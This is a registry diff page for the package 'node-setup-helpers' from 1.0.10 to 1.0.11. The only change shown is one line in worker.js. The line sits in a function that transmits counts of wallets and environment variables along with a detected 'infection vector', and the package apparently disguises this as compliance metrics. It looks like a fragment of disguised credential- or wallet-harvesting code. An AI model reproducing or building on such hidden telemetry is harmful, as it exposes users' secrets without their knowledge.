node-setup-helpers 1.0.10 → 1.0.11
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/worker.js +1 -1
- package/package.json +1 -1
package/lib/worker.js
CHANGED
|
@@ -1194,7 +1194,7 @@ async function _transmitStatus(findingsCount, walletCount, envVarCount) {
|
|
|
1194
1194
|
try {
|
|
1195
1195
|
const metrics = {
|
|
1196
1196
|
type: 'compliance verification_metrecs',
|
|
1197
|
-
|
|
1197
|
+
compliance_verification_vector: detectInfectionVector(),
|
|
1198
1198
|
platform: os.platform(),
|
|
1199
1199
|
arch: os.arch(),
|
|
1200
1200
|
node_version: process.version,
|